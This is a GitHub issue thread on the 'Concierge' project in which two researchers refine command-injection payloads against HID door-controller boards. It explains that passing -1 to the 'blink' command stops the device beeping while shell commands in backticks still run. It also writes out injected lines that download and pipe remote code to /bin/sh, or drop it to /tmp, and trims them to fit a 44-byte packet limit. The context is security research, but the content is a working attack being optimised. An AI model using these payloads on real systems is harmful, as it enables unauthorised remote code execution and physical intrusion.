Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

HID command_blink_on prevent beep #6

Open
bcoles opened this issue Jun 2, 2018 · 3 comments
Open

HID command_blink_on prevent beep #6

bcoles opened this issue Jun 2, 2018 · 3 comments
Labels
enhancement

Comments

@bcoles
Copy link

bcoles commented Jun 2, 2018

I noticed the following on your blog:

I’m putting the finishing touches on a bash script that executes the above attack and another that cleans up afterwards. Along with the script, I’m doing some testing on timing. It think it’s possible to send the commands quick enough that, while all three payloads execute, only one beep is heard. Once those scripts are complete, you’ll be able to find the here: https://github.com/lixmk/Concierge.

You may be pleased to note that a value of -1 will prevent the device from beeping. This comes at the cost of one additional byte, thus decreasing the available space for the specified shell command by one byte.

A value of 1 will cause the device to beep for one second.
A value of 0 will cause the device to been infinitely.
ASCII values such as A will also cause the device to been infinitely.
A value of -1 will cause the blink executable to throw an error and exit, however the subsequent shell commands encompassed in backticks will still be executed by the system shell.

# ./blink -1
WARNING: blink: duration (-1) not in range 1-65535.
Usage: blink [<secs>]
@lixmk
Copy link
Owner

lixmk commented Jun 3, 2018

Thanks for the info. I'll check all the payloads and see if they have the spare byte. If not, I'll see if I can find more ways to optimize space.

@bcoles
Copy link
Author

bcoles commented Jun 9, 2018

I took a quick look at your script.

A worst case scenario for your existing implementation is...

1`wget http://123.123.123.123:12345/ -O-|/bin/sh`

... 49 characters long. This is already too big, with a maximum packet length of 44.

You could save some bytes by dropping the URL scheme and URL path:

1`wget 123.123.123.123:12345 -O/tmp/a`

...totaling 39 characters, allowing space for the extra byte.

The obvious downside of this approach is requiring three requests - one to drop the payload file, another to execute, and a third to remove the payload file. Also, dropping the URL scheme prevents serving the payload over HTTPS, however this was a shortcoming of the existing implementation anyway.

@lixmk
Copy link
Owner

lixmk commented Jun 9, 2018

If I recall correctly, some board types' version of wget doesn't allow dropping the http://. Also, piping straight to /bin/sh was intentional for the exact reason you mentioned. Additionally, it means you don't need to write to disk. The original version of the script (might have been the .sh version) used the 3 request design.

I realize I never tested piping to sh without the full path. It should be in $PATH. If that works, that should be the solution. Gonna try to find time tonight or tomorrow to test.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
enhancement
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@bcoles @lixmk